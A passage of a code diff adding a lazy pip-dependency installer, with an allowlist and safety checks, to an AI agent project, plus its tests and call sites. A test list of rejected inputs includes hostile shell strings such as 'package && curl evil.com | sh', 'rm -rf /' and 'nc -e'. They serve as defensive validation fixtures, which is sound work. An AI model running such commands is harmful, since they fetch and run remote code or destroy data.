+        "git+https://github.com/foo/bar.git",
+        "https://example.com/foo.tar.gz",
+        # File path → rejected
+        "/etc/passwd",
+        "./local-malware",
+        "../escape",
+        # Shell metacharacters → rejected
+        "package; rm -rf /",
+        "package && curl evil.com | sh",
+        "package`whoami`",
+        "package$(whoami)",
+        "package|nc -e",
+        # Pip flag injection → rejected
+        "--index-url=http://evil/",
+        "-r requirements.txt",
+        # Whitespace control chars → rejected
+        "package\nshell-injection",
+        "package\rmore",
+        # Empty / overly long → rejected
+        "",
+        "x" * 500,
+    ])
+    def test_unsafe_specs_rejected(self, spec):
+        assert not ld._spec_is_safe(spec), \
+            f"expected {spec!r} to be rejected"
+
+
+# ---------------------------------------------------------------------------
+# Allowlist enforcement
+# ---------------------------------------------------------------------------
+
+
+class TestAllowlist:
+    def test_unknown_feature_raises(self, monkeypatch):
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        with pytest.raises(ld.FeatureUnavailable, match="not in LAZY_DEPS"):
+            ld.ensure("not.a.real.feature")
+
+    def test_lazy_deps_keys_use_namespace_dot_name(self):
+        # Sanity check on the data shape — every key should be at least
+        # one dot-separated namespace.
+        for key in ld.LAZY_DEPS:
+            assert "." in key, f"feature {key!r} should be namespace.name"
+
+    def test_every_lazy_dep_spec_passes_safety(self):
+        # Defence in depth — even though specs are author-controlled,
+        # the safety regex must accept everything we ship.
+        for feature, specs in ld.LAZY_DEPS.items():
+            for spec in specs:
+                assert ld._spec_is_safe(spec), \
+                    f"{feature}: spec {spec!r} fails safety check"
+
+    def test_feature_install_command_returns_pip_invocation(self):
+        cmd = ld.feature_install_command("memory.honcho")
+        assert cmd is not None
+        assert cmd.startswith("uv pip install")
+        assert "honcho-ai" in cmd
+
+    def test_feature_install_command_unknown(self):
+        assert ld.feature_install_command("not.real") is None
+
+
+# ---------------------------------------------------------------------------
+# allow_lazy_installs gating
+# ---------------------------------------------------------------------------
+
+
+class TestSecurityGating:
+    def test_disabled_via_config_raises(self, monkeypatch):
+        # Pretend honcho is missing AND lazy installs are disabled.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.feat", ("packageX>=1.0,<2",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: False)
+        with pytest.raises(ld.FeatureUnavailable, match="lazy installs disabled"):
+            ld.ensure("test.feat", prompt=False)
+
+    def test_disabled_via_env_var(self, monkeypatch):
+        monkeypatch.setenv("HERMES_DISABLE_LAZY_INSTALLS", "1")
+        # Bypass config layer; the env var alone must disable.
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: {"security": {"allow_lazy_installs": True}},
+        )
+        assert ld._allow_lazy_installs() is False
+
+    def test_default_allows(self, monkeypatch):
+        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: {"security": {}},
+        )
+        assert ld._allow_lazy_installs() is True
+
+    def test_config_failure_fails_open(self, monkeypatch):
+        # If config can't be read at all, we ALLOW installs rather than
+        # blocking the user out of their own backends.
+        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: (_ for _ in ()).throw(RuntimeError("config broken")),
+        )
+        assert ld._allow_lazy_installs() is True
+
+
+# ---------------------------------------------------------------------------
+# ensure() happy/sad paths
+# ---------------------------------------------------------------------------
+
+
+class TestEnsure:
+    def test_already_satisfied_is_noop(self, monkeypatch):
+        # If the package is importable, ensure() returns without calling pip.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.satisfied", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
+        # If pip were called, this would fail loudly.
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda *a, **kw: pytest.fail("pip should not be called"),
+        )
+        ld.ensure("test.satisfied", prompt=False)  # no exception
+
+    def test_install_success_path(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.install", ("zzzfake>=1",))
+        # First check sees missing, post-install check sees installed.
+        call_count = {"n": 0}
+
+        def fake_satisfied(spec):
+            call_count["n"] += 1
+            return call_count["n"] > 1  # missing first, installed after
+
+        monkeypatch.setattr(ld, "_is_satisfied", fake_satisfied)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
+        )
+        ld.ensure("test.install", prompt=False)
+
+    def test_install_failure_surfaces_pip_stderr(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.fail", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(
+                False, "", "ERROR: package not found on PyPI"
+            ),
+        )
+        with pytest.raises(ld.FeatureUnavailable, match="pip install failed"):
+            ld.ensure("test.fail", prompt=False)
+
+    def test_install_succeeds_but_still_missing_raises(self, monkeypatch):
+        # Pip says success but the package still isn't importable
+        # (e.g. site-packages caching, wrong python). Surface this.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.cache", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
+        )
+        with pytest.raises(ld.FeatureUnavailable, match="still not importable"):
+            ld.ensure("test.cache", prompt=False)
+
+
+# ---------------------------------------------------------------------------
+# is_available
+# ---------------------------------------------------------------------------
+
+
+class TestIsAvailable:
+    def test_unknown_feature_returns_false(self):
+        assert ld.is_available("not.a.thing") is False
+
+    def test_satisfied_returns_true(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.avail", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
+        assert ld.is_available("test.avail") is True
+
+    def test_missing_returns_false(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.miss", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        assert ld.is_available("test.miss") is False
diff --git a/tests/tools/test_windows_native_support.py b/tests/tools/test_windows_native_support.py
index 4d4091e5fcb..550249b5ce3 100644
--- a/tests/tools/test_windows_native_support.py
+++ b/tests/tools/test_windows_native_support.py
@@ -420,12 +420,21 @@ class TestTzdataDependencyDeclared:
         root = Path(__file__).resolve().parents[2]
         source = (root / "pyproject.toml").read_text(encoding="utf-8")
         # The dependency line should be conditional on sys_platform == 'win32'
-        # and should NOT be in the core dependencies for Linux/macOS.
-        assert (
-            'tzdata>=2023.3; sys_platform == \'win32\'' in source
-            or "tzdata>=2023.3; sys_platform == 'win32'" in source
-            or 'tzdata>=2023.3; sys_platform == "win32"' in source
-        ), "tzdata must be a Windows-only dep in pyproject.toml dependencies"
+        # and should NOT be in the core dependencies for Linux/macOS. We do
+        # not care about the exact pinned version (which is bumped over time)
+        # — only that tzdata is declared with a win32 marker. This is an
+        # invariant check, not a snapshot test.
+        import re
+        # Match `"tzdata` … `; sys_platform == 'win32'"` allowing any version
+        # specifier in between (==X.Y.Z, >=X.Y.Z,<W, etc.) and either quote
+        # style on the marker.
+        pattern = re.compile(
+            r'"tzdata[^"]*;\s*sys_platform\s*==\s*[\'"]win32[\'"]\s*"'
+        )
+        assert pattern.search(source), (
+            "tzdata must be a Windows-only dep in pyproject.toml dependencies "
+            "(declared with a `; sys_platform == 'win32'` marker)"
+        )
 
 
 # ---------------------------------------------------------------------------
diff --git a/tools/environments/daytona.py b/tools/environments/daytona.py
index a32ec900c6a..1c677fc467d 100644
--- a/tools/environments/daytona.py
+++ b/tools/environments/daytona.py
@@ -51,6 +51,13 @@ class DaytonaEnvironment(BaseEnvironment):
         requested_cwd = cwd
         super().__init__(cwd=cwd, timeout=timeout)
 
+        try:
+            from tools.lazy_deps import ensure as _lazy_ensure
+            _lazy_ensure("terminal.daytona", prompt=False)
+        except ImportError:
+            pass
+        except Exception as e:
+            raise ImportError(str(e))
         from daytona import (
             Daytona,
             CreateSandboxFromImageParams,
diff --git a/tools/environments/modal.py b/tools/environments/modal.py
index 4b7e9db0cd6..1a230d85603 100644
--- a/tools/environments/modal.py
+++ b/tools/environments/modal.py
@@ -80,11 +80,23 @@ def _delete_direct_snapshot(task_id: str, snapshot_id: str | None = None) -> Non
         _save_snapshots(snapshots)
 
 
+def _ensure_modal_sdk() -> None:
+    """Lazy-install modal on demand. Idempotent — fast no-op once installed."""
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("terminal.modal", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
+
+
 def _resolve_modal_image(image_spec: Any) -> Any:
     """Convert registry references or snapshot ids into Modal image objects.
 
     Includes add_python support for ubuntu/debian images (absorbed from PR 4511).
     """
+    _ensure_modal_sdk()
     import modal as _modal
 
     if not isinstance(image_spec, str):
@@ -183,6 +195,7 @@ class ModalEnvironment(BaseEnvironment):
             if restored_snapshot_id:
                 logger.info("Modal: restoring from snapshot %s", restored_snapshot_id[:20])
 
+        _ensure_modal_sdk()
         import modal as _modal
 
         cred_mounts = []
diff --git a/tools/environments/vercel_sandbox.py b/tools/environments/vercel_sandbox.py
index b381eb77cd2..70edd54ad4a 100644
--- a/tools/environments/vercel_sandbox.py
+++ b/tools/environments/vercel_sandbox.py
@@ -42,6 +42,19 @@ if TYPE_CHECKING:
 
 DEFAULT_VERCEL_CWD = "/vercel/sandbox"
 _DEFAULT_CONTAINER_DISK_MB = 51200
+
+
+def _ensure_vercel_sdk() -> None:
+    """Lazy-install vercel SDK on demand. Idempotent."""
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("terminal.vercel", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
+
+
 _CREATE_RETRY_ATTEMPTS = 3
 _WRITE_RETRY_ATTEMPTS = 3
 _TRANSIENT_STATUS_CODES = frozenset({408, 425, 429, 500, 502, 503, 504})
@@ -194,6 +207,7 @@ def _extract_snapshot_id(snapshot: Any) -> str | None:
 
 @cache
 def _sandbox_status_type() -> type[SandboxStatus]:
+    _ensure_vercel_sdk()
     from vercel.sandbox import SandboxStatus
 
     return SandboxStatus
@@ -260,6 +274,7 @@ class VercelSandboxEnvironment(BaseEnvironment):
                 "Use the default shared setting."
             )
 
+        _ensure_vercel_sdk()
         from vercel.sandbox import Resources
 
         sandbox_timeout = max(
@@ -281,6 +296,7 @@ class VercelSandboxEnvironment(BaseEnvironment):
         )
 
     def _create_sandbox(self) -> Sandbox:
+        _ensure_vercel_sdk()
         from vercel.sandbox import Sandbox
 
         snapshot_id = _get_snapshot_id(self._task_id) if self._persistent else None
diff --git a/tools/image_generation_tool.py b/tools/image_generation_tool.py
index a545a85d9fc..c496166ec98 100644
--- a/tools/image_generation_tool.py
+++ b/tools/image_generation_tool.py
@@ -52,6 +52,13 @@ def _load_fal_client() -> Any:
     global fal_client
     if fal_client is not None:
         return fal_client
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("image.fal", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
     import fal_client as _fal_client  # noqa: F811 — module-global rebind
     fal_client = _fal_client
     return fal_client
diff --git a/tools/lazy_deps.py b/tools/lazy_deps.py
new file mode 100644
index 00000000000..d086d117307
--- /dev/null
+++ b/tools/lazy_deps.py
@@ -0,0 +1,441 @@
+"""
+Lazy dependency installer for opt-in Hermes Agent backends.
+
+Many Hermes features (Mistral TTS, ElevenLabs TTS, Honcho memory, Bedrock,
+Slack, Matrix, etc.) require Python packages that not every user needs. The
+historical approach was to bundle them all under ``pyproject.toml`` extras
+(``hermes-agent[all]``) and install them eagerly at setup time. That has
+two problems:
+
+1. **Fragility.** When one extra's transitive dependency becomes
+   unavailable on PyPI (quarantined for malware, yanked, broken upload),
+   the *entire* ``[all]`` resolve fails and fresh installs silently fall
+   back to a stripped tier — losing 10+ unrelated extras at once.
+
+2. **Bloat.** A user who only ever talks to one provider pulls hundreds
+   of packages they will never import.
+
+The lazy-install pattern fixes both. Backends call :func:`ensure` at the
+top of their first-import path. If the deps are missing, ``ensure`` checks
+the ``security.allow_lazy_installs`` config flag (default true) and runs
+a venv-scoped pip install. If the user has explicitly disabled lazy
+installs, ``ensure`` raises :class:`FeatureUnavailable` with a clear
+remediation hint pointing at ``hermes tools`` or the manual pip command.
+
+Security model:
+
+* **Venv-scoped only.** Installs target ``sys.executable`` in the active
+  venv. We never touch the system Python.
+* **PyPI by package name only.** Specs may be ``"package>=1.0,<2"`` etc.
+  We do NOT support ``--index-url`` overrides, ``git+https://``, file:
+  paths, or any other input that could be hijacked by a malicious config.
+* **Allowlist.** Only specs that appear in :data:`LAZY_DEPS` can be
+  installed via this path. A typo in feature name doesn't get the user
+  install-anything semantics.
+* **Opt-out.** Setting ``security.allow_lazy_installs: false`` in
+  ``config.yaml`` disables runtime installs. Users in restricted networks
+  or strict security postures can pin themselves to whatever was installed
+  at setup time.
+* **Offline detection.** If the install fails (offline, mirror down,
+  PyPI 404 / quarantine), we surface the failure as
+  :class:`FeatureUnavailable` with the actual pip stderr — no silent
+  retries, no caching of bad state.
+
+Adding a new backend:
+
+1. Add an entry to :data:`LAZY_DEPS` with the package specs.
+2. At the top of the backend module's import path, call
+   ``ensure("feature.name")`` inside a try/except that converts
+   :class:`FeatureUnavailable` to a useful runtime error.
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import re
+import shutil
+import subprocess
+import sys
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Optional
+
+logger = logging.getLogger(__name__)
+
+
+# =============================================================================
+# Allowlist of lazy-installable backends.
+#
+# Keys are dot-separated feature names ("namespace.backend"). Values are
+# tuples of pip-installable specs that match the corresponding extra in
+# pyproject.toml. The framework enforces that only specs from this map
+# can flow into the pip install command.
+# =============================================================================
+
+
+LAZY_DEPS: dict[str, tuple[str, ...]] = {
+    # ─── Inference providers ───────────────────────────────────────────────
+    # Native Anthropic SDK — needed when provider=anthropic (not via
+    # OpenRouter / aggregators which use the openai SDK).
+    "provider.anthropic": ("anthropic==0.86.0",),
+    # AWS Bedrock provider
+    "provider.bedrock": ("boto3==1.42.89",),
+
+    # ─── Web search backends ───────────────────────────────────────────────
+    "search.exa": ("exa-py==2.10.2",),
+    "search.firecrawl": ("firecrawl-py==4.17.0",),
+    "search.parallel": ("parallel-web==0.4.2",),
+
+    # ─── TTS providers ─────────────────────────────────────────────────────
+    # Pinned to exact versions to match pyproject.toml's no-ranges policy
+    # (see comment at top of [project.dependencies]). When bumping, update
+    # both this map AND the corresponding extra in pyproject.toml.
+    #
+    # NOTE: tts.mistral / stt.mistral entries are intentionally absent —
+    # the `mistralai` PyPI project is quarantined as of 2026-05-12 (Mini
+    # Shai-Hulud worm). Re-add when PyPI restores a clean release; see
+    # comment in pyproject.toml above the (removed) `mistral` extra for
+    # the full restoration checklist.
+    "tts.edge": ("edge-tts==7.2.7",),
+    "tts.elevenlabs": ("elevenlabs==1.59.0",),
+
+    # ─── Speech-to-text providers ──────────────────────────────────────────
+    "stt.faster_whisper": (
+        "faster-whisper==1.2.1",
+        "sounddevice==0.5.5",
+        "numpy==2.4.3",
+    ),
+
+    # ─── Image generation backends ─────────────────────────────────────────
+    "image.fal": ("fal-client==0.13.1",),
+
+    # ─── Memory providers ──────────────────────────────────────────────────
+    "memory.honcho": ("honcho-ai==2.0.1",),
+    "memory.hindsight": ("hindsight-client==0.6.1",),
+
+    # ─── Messaging platforms (lazy-installable on demand) ──────────────────
+    "platform.telegram": ("python-telegram-bot[webhooks]==22.6",),
+    "platform.discord": ("discord.py[voice]==2.7.1",),
+    "platform.slack": (
+        "slack-bolt==1.27.0",
+        "slack-sdk==3.40.1",
+    ),
+    "platform.matrix": (
+        "mautrix[encryption]==0.21.0",
+        "Markdown==3.10.2",
+        "aiosqlite==0.22.1",
+        "asyncpg==0.31.0",
+        "aiohttp-socks==0.11.0",
+    ),
+    "platform.dingtalk": (
+        "dingtalk-stream==0.24.3",
+        "alibabacloud-dingtalk==2.2.42",
+        "qrcode==7.4.2",
+    ),
+    "platform.feishu": (
+        "lark-oapi==1.5.3",
+        "qrcode==7.4.2",
+    ),
+
+    # ─── Terminal backends ─────────────────────────────────────────────────
+    "terminal.modal": ("modal==1.3.4",),
+    "terminal.daytona": ("daytona==0.155.0",),
+    "terminal.vercel": ("vercel==0.5.7",),
+
+    # ─── Skills ────────────────────────────────────────────────────────────
+    "skill.google_workspace": (
+        "google-api-python-client==2.194.0",
+        "google-auth-oauthlib==1.3.1",
+        "google-auth-httplib2==0.3.1",
+    ),
+    "skill.youtube": ("youtube-transcript-api==1.2.4",),
+
+    # ─── Tools ─────────────────────────────────────────────────────────────
+    # ACP adapter (VS Code / Zed / JetBrains integration)
+    "tool.acp": ("agent-client-protocol==0.9.0",),
+    # Dashboard (`hermes dashboard`)
+    "tool.dashboard": (
+        "fastapi==0.133.1",
+        "uvicorn[standard]==0.41.0",
+    ),
+}
+
+
+# Conservative regex for spec validation — package name plus optional
+# version range. Reject anything that looks like a URL, file path, or shell
+# metacharacter.
+_SAFE_SPEC = re.compile(
+    r"^[A-Za-z0-9_][A-Za-z0-9_.\-]*"        # package name
+    r"(?:\[[A-Za-z0-9_,\-]+\])?"            # optional [extras]
+    r"(?:[<>=!~]=?[A-Za-z0-9_.\-+,*<>=!~]+)?"  # optional version specifier
+    r"$"
+)
+
+
+class FeatureUnavailable(RuntimeError):
+    """A lazily-installable feature is missing and cannot be made available.
+
+    Either the deps were never installed and the user has disabled lazy
+    installs, or the install attempt failed.
+    """
+
+    def __init__(self, feature: str, missing: tuple[str, ...], reason: str):
+        self.feature = feature
+        self.missing = missing
+        self.reason = reason
+        super().__init__(self._format())
+
+    def _format(self) -> str:
+        spec_list = " ".join(repr(s) for s in self.missing)
+        return (
+            f"Feature {self.feature!r} unavailable: {self.reason}. "
+            f"To enable manually: uv pip install {spec_list}  "
+            f"(or: pip install {spec_list})."
+        )
+
+
+@dataclass(frozen=True)
+class _InstallResult:
+    success: bool
+    stdout: str
+    stderr: str
+
+
+# =============================================================================
+# Internals
+# =============================================================================
+
+
+def _allow_lazy_installs() -> bool:
+    """Return the ``security.allow_lazy_installs`` config flag.
+
+    Defaults to True. If config is unreadable we fail open (allow), because
+    refusing to install would lock people out of their own backends; the
+    decision to block is an explicit user opt-in.
+    """
+    if os.environ.get("HERMES_DISABLE_LAZY_INSTALLS") == "1":
+        return False
+    try:
+        from hermes_cli.config import load_config
+        cfg = load_config()
+    except Exception:
+        return True
+    sec = cfg.get("security") or {}
+    val = sec.get("allow_lazy_installs", True)
+    return bool(val)
+
+
+def _spec_is_safe(spec: str) -> bool:
+    """Reject pip specs that contain URLs, paths, or shell metacharacters."""
+    if not spec or len(spec) > 200:
+        return False
+    if any(ch in spec for ch in (";", "|", "&", "`", "$", "\n", "\r", "\t", "\\")):
+        return False
+    if spec.startswith(("-", "/", ".")) or "://" in spec or "@" in spec:
+        return False
+    return bool(_SAFE_SPEC.match(spec))
+
+
+def _pkg_name_from_spec(spec: str) -> str:
+    """Extract the bare package name from a pip spec.
+
+    ``"slack-bolt>=1.18.0,<2"`` → ``"slack-bolt"``
+    ``"mautrix[encryption]>=0.20"`` → ``"mautrix"``
+    """
+    m = re.match(r"^([A-Za-z0-9_][A-Za-z0-9_.\-]*)", spec)
+    return m.group(1) if m else spec
+
+
+def _is_satisfied(spec: str) -> bool:
+    """Best-effort check: is ``spec`` already satisfied in the current env?
+
+    We don't enforce the version range — if the package is importable
+    we assume the user knows what they're doing. This matches how the
+    lazy-import sites already behave.
+    """
+    pkg = _pkg_name_from_spec(spec)
+    try:
+        from importlib.metadata import PackageNotFoundError, version
+    except ImportError:
+        return False
+    try:
+        version(pkg)
+        return True
+    except PackageNotFoundError:
+        return False
+    except Exception:
+        return False
+
+
+def _venv_pip_install(specs: tuple[str, ...], *, timeout: int = 300) -> _InstallResult:
+    """Install ``specs`` into the active venv using uv → pip → ensurepip ladder.
+
+    Mirrors the strategy in ``hermes_cli.tools_config._pip_install`` but
+    kept independent here so this module has no CLI dependency.
+    """
+    if not specs:
+        return _InstallResult(True, "", "")
+
+    venv_root = Path(sys.executable).parent.parent
+    uv_env = {**os.environ, "VIRTUAL_ENV": str(venv_root)}
+
+    # Tier 1: uv (preferred — fast, doesn't need pip in the venv)
+    uv_bin = shutil.which("uv")
+    if uv_bin:
+        try:
+            r = subprocess.run(
+                [uv_bin, "pip", "install", *specs],
+                capture_output=True, text=True, timeout=timeout, env=uv_env,
+            )
+            if r.returncode == 0:
+                return _InstallResult(True, r.stdout or "", r.stderr or "")
+            logger.debug("uv pip install failed: %s", r.stderr)
+        except (subprocess.TimeoutExpired, FileNotFoundError) as e:
+            logger.debug("uv invocation failed: %s", e)
+
+    # Tier 2: python -m pip (with ensurepip bootstrap if needed)
+    pip_cmd = [sys.executable, "-m", "pip"]
+    try:
+        probe = subprocess.run(
+            pip_cmd + ["--version"],
+            capture_output=True, text=True, timeout=15,
+        )
+        if probe.returncode != 0:
+            raise FileNotFoundError("pip not in venv")
+    except (subprocess.TimeoutExpired, FileNotFoundError):
+        try:
+            subprocess.run(
+                [sys.executable, "-m", "ensurepip", "--upgrade", "--default-pip"],
+                capture_output=True, text=True, timeout=120, check=True,
+            )
+        except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
+            return _InstallResult(False, "",
+                                  f"pip not available and ensurepip failed: {e}")
+
+    try:
+        r = subprocess.run(
+            pip_cmd + ["install", *specs],
+            capture_output=True, text=True, timeout=timeout,
+        )
+        return _InstallResult(r.returncode == 0, r.stdout or "", r.stderr or "")
+    except subprocess.TimeoutExpired as e:
+        return _InstallResult(False, "", f"pip install timed out: {e}")
+    except Exception as e:
+        return _InstallResult(False, "", f"pip install failed: {e}")
+
+
+# =============================================================================
+# Public API
+# =============================================================================
+
+
+def feature_specs(feature: str) -> tuple[str, ...]:
+    """Return the registered specs for a feature, or raise KeyError."""
+    if feature not in LAZY_DEPS:
+        raise KeyError(f"Unknown lazy feature: {feature!r}")
+    return LAZY_DEPS[feature]
+
+
+def feature_missing(feature: str) -> tuple[str, ...]:
+    """Return the subset of specs for ``feature`` not currently installed."""
+    return tuple(s for s in feature_specs(feature) if not _is_satisfied(s))
+
+
+def ensure(feature: str, *, prompt: bool = True) -> None:
+    """Make sure all packages for ``feature`` are importable.
+
+    If they're missing, attempts to install them in the active venv. Raises
+    :class:`FeatureUnavailable` if the user has disabled lazy installs or
+    if the install attempt fails.
+
+    ``prompt``: when True (default) and stdin is a TTY, asks the user to
+    confirm before installing. Non-interactive callers (gateway, cron,
+    batch) get prompt=False and skip the confirmation — config flag is
+    the gate in that case.
+    """
+    if feature not in LAZY_DEPS:
+        raise FeatureUnavailable(
+            feature, (), f"feature {feature!r} not in LAZY_DEPS allowlist"
+        )
+
+    missing = feature_missing(feature)
+    if not missing:
+        return
+
+    # Validate every spec against the allowlist + safety regex. Belt and
+    # braces — the keys-in-LAZY_DEPS check above already constrains this.
+    for spec in missing:
+        if not _spec_is_safe(spec):
+            raise FeatureUnavailable(
+                feature, missing,
+                f"refusing to install unsafe spec {spec!r}"
+            )
+
+    if not _allow_lazy_installs():
+        raise FeatureUnavailable(
+            feature, missing,
+            "lazy installs disabled (security.allow_lazy_installs=false)"
+        )
+
+    if prompt and sys.stdin.isatty() and sys.stdout.isatty():
+        spec_list = ", ".join(missing)
+        try:
+            answer = input(
+                f"\nFeature {feature!r} requires: {spec_list}\n"
+                f"Install into the active venv now? [Y/n] "
+            ).strip().lower()
+        except (EOFError, KeyboardInterrupt):
+            answer = "n"
+        if answer and answer not in ("y", "yes"):
+            raise FeatureUnavailable(
+                feature, missing, "user declined install at prompt"
+            )
+
+    logger.info("Lazy-installing %s for feature %r", " ".join(missing), feature)
+    result = _venv_pip_install(missing)
+    if not result.success:
+        # Surface the actual pip error so the user can debug PyPI-side
+        # issues (404 quarantine, network down, etc.).
+        snippet = (result.stderr or result.stdout or "").strip()
+        if snippet:
+            # Clip to a readable size — pip can dump pages of resolution traces.
+            snippet = snippet[-2000:]
+        raise FeatureUnavailable(
+            feature, missing,
+            f"pip install failed: {snippet or 'no error output'}"
+        )
+
+    # Verify post-install. importlib.metadata caches per-process, so if we
+    # just installed something the cache may not see it without a refresh.
+    try:
+        import importlib.metadata as _md
+        if hasattr(_md, "_cache_clear"):
+            _md._cache_clear()  # type: ignore[attr-defined]
+    except Exception:
+        pass
+
+    still_missing = feature_missing(feature)
+    if still_missing:
+        raise FeatureUnavailable(
+            feature, still_missing,
+            "install reported success but packages still not importable "
+            "(may require Python restart)"
+        )
+
+    logger.info("Lazy install complete for feature %r", feature)
+
+
+def is_available(feature: str) -> bool:
+    """Return True if the feature's deps are already satisfied."""
+    if feature not in LAZY_DEPS:
+        return False
+    return not feature_missing(feature)
+
+
+def feature_install_command(feature: str) -> Optional[str]:
+    """Return the ``pip install`` command a user could run manually, or None."""
+    if feature not in LAZY_DEPS:
+        return None
+    specs = LAZY_DEPS[feature]
+    return "uv pip install " + " ".join(repr(s) for s in specs)
diff --git a/tools/tts_tool.py b/tools/tts_tool.py
index 31e080332b1..1ea3ba21c63 100644
--- a/tools/tts_tool.py
+++ b/tools/tts_tool.py
@@ -80,11 +80,34 @@ from tools.xai_http import hermes_xai_user_agent
 
 def _import_edge_tts():
     """Lazy import edge_tts. Returns the module or raises ImportError."""
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("tts.edge", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
     import edge_tts
     return edge_tts
 
 def _import_elevenlabs():
-    """Lazy import ElevenLabs client. Returns the class or raises ImportError."""
+    """Lazy import ElevenLabs client. Returns the class or raises ImportError.
+
+    Calls :func:`tools.lazy_deps.ensure` first so the SDK gets installed on
+    demand if the user picked ElevenLabs as their TTS provider but never ran
+    the post-setup hook (e.g. enabled it by editing config.yaml directly).
+    Raises ``ImportError`` on lazy-install failure so existing callers'
+    error-handling paths keep working.
+    """
+    try:
+        from tools.lazy_deps import FeatureUnavailable, ensure
+        ensure("tts.elevenlabs", prompt=False)
+    except ImportError:
+        # lazy_deps module itself missing — fall through to the raw import
+        # so older code paths still get a clean ImportError.
+        pass
+    except Exception as e:  # FeatureUnavailable or any unexpected error
+        raise ImportError(str(e))
     from elevenlabs.client import ElevenLabs
     return ElevenLabs
 
diff --git a/tools/web_tools.py b/tools/web_tools.py
index ba14b07a41c..401a34a5736 100644
--- a/tools/web_tools.py
+++ b/tools/web_tools.py
@@ -64,6 +64,13 @@ def _load_firecrawl_cls() -> type:
     """Import and cache ``firecrawl.Firecrawl``."""
     global _FIRECRAWL_CLS_CACHE
     if _FIRECRAWL_CLS_CACHE is None:
+        try:
+            from tools.lazy_deps import ensure as _lazy_ensure
+            _lazy_ensure("search.firecrawl", prompt=False)
+        except ImportError:
+            pass
+        except Exception as e:
+            raise ImportError(str(e))
         from firecrawl import Firecrawl as _cls
         _FIRECRAWL_CLS_CACHE = _cls
     return _FIRECRAWL_CLS_CACHE
@@ -358,6 +365,13 @@ def _get_parallel_client():
 
     Requires PARALLEL_API_KEY environment variable.
     """
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("search.parallel", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
     from parallel import Parallel
     global _parallel_client
     if _parallel_client is None:
@@ -376,6 +390,13 @@ def _get_async_parallel_client():
 
     Requires PARALLEL_API_KEY environment variable.
     """
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("search.parallel", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
     from parallel import AsyncParallel
     global _async_parallel_client
     if _async_parallel_client is None:
@@ -990,6 +1011,13 @@ def _get_exa_client():
 
     Requires EXA_API_KEY environment variable.
     """
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("search.exa", prompt=False)
+    except ImportError:
+        pass
+    except Exception as e:
+        raise ImportError(str(e))
     from exa_py import Exa
     global _exa_client
     if _exa_client is None:
diff --git a/uv.lock b/uv.lock
index 93fe3d6f0ee..5051fdf0727 100644
--- a/uv.lock
+++ b/uv.lock
@@ -1394,15 +1394,6 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/97/a8/c070e1340636acb38d4e6a7e45c46d168a462b48b9b3257e14ca0e5af79b/environs-14.6.0-py3-none-any.whl", hash = "sha256:f8fb3d6c6a55872b0c6db077a28f5a8c7b8984b7c32029613d44cef95cfc0812", size = 17205, upload-time = "2026-02-20T04:02:07.299Z" },
 ]
 
-[[package]]
-name = "eval-type-backport"
-version = "0.3.1"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/fb/a3/cafafb4558fd638aadfe4121dc6cefb8d743368c085acb2f521df0f3d9d7/eval_type_backport-0.3.1.tar.gz", hash = "sha256:57e993f7b5b69d271e37482e62f74e76a0276c82490cf8e4f0dffeb6b332d5ed", size = 9445, upload-time = "2025-12-02T11:51:42.987Z" }
-wheels = [
